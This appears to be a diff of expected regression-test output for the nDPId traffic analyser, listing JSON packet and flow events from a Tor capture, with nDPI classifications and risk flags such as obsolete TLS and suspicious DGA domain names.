00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1831,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821774532,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1831,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821774532,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1831,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821782213} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1831,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821782213}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1832,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821774532,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1832,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821774532,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1832,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821784213} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1832,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821784213}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1833,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821774532,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1833,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821774532,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1833,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821786213} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1833,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821786213}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1835,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822123915,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1835,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822123915,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1835,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822124212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1835,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822124212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1836,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822123915,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1836,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822123915,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1836,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822126212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1836,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822126212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1837,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822123915,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1837,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822123915,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1837,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822128212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1837,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822128212}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1840,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822129889,"flow_last_seen":1383822129889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822129889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1840,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822129889,"flow_last_seen":1383822129889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822129889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1840,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1383822129889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CJdAAIAGvzrAqAH81FOb+sfmAbsbVwNmAAAAAIACIAAzvwAAAgQFtAEDAwgBAQQC"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1840,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1383822129889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CJdAAIAGvzrAqAH81FOb+sfmAbsbVwNmAAAAAIACIAAzvwAAAgQFtAEDAwgBAQQC"}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1841,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822129897,"flow_last_seen":1383822129897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822129897,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1841,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822129897,"flow_last_seen":1383822129897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822129897,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -174,16 +174,16 @@
01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1847,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129897,"flow_last_seen":1383822129972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383822129972,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1847,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129897,"flow_last_seen":1383822129972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383822129972,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01153{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1849,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129889,"flow_last_seen":1383822130023,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":743,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1383822130023,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.wohgpas45j6ucw.com","subjectDN":"CN=www.7d43ah2kikrabj.net","fingerprint":"F9:1D:5F:89:8F:D8:58:1E:45:E7:9B:A6:FD:90:95:77:FF:DD:E8:1B"}} 01153{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1849,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129889,"flow_last_seen":1383822130023,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":743,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1383822130023,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.wohgpas45j6ucw.com","subjectDN":"CN=www.7d43ah2kikrabj.net","fingerprint":"F9:1D:5F:89:8F:D8:58:1E:45:E7:9B:A6:FD:90:95:77:FF:DD:E8:1B"}}
01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1852,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129897,"flow_last_seen":1383822130047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":961,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383822130047,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} 01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1852,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129897,"flow_last_seen":1383822130047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":961,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383822130047,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822130168,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822130168,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822130216} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822130216}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822130889,"flow_last_seen":1383822130889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822130889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822130889,"flow_last_seen":1383822130889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822130889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1383822130889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822130889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CK1AAIAGwljAqAH8JuVGNcfoAbv0twffAAAAAIACIABZFwAAAgQFtAEDAwgBAQQC"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1383822130889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822130889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CK1AAIAGwljAqAH8JuVGNcfoAbv0twffAAAAAIACIABZFwAAAgQFtAEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1383822131033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822131033,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x+hg0\/cE9LcH4IASOQjoIwAAAgQFtAEBBAIBAwMK"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1383822131033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822131033,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x+hg0\/cE9LcH4IASOQjoIwAAAgQFtAEBBAIBAwMK"}
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1383822131034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822131034,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCK9AAIAGwmLAqAH8JuVGNcfoAbv0twfgYNP3BVAQAQBhAQAAAAAAAAAA"} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1383822131034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822131034,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCK9AAIAGwmLAqAH8JuVGNcfoAbv0twfgYNP3BVAQAQBhAQAAAAAAAAAA"}
00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1893,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822130889,"flow_last_seen":1383822131034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822131034,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1893,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822130889,"flow_last_seen":1383822131034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822131034,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01151{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1896,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822130889,"flow_last_seen":1383822131220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":1383822131220,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} 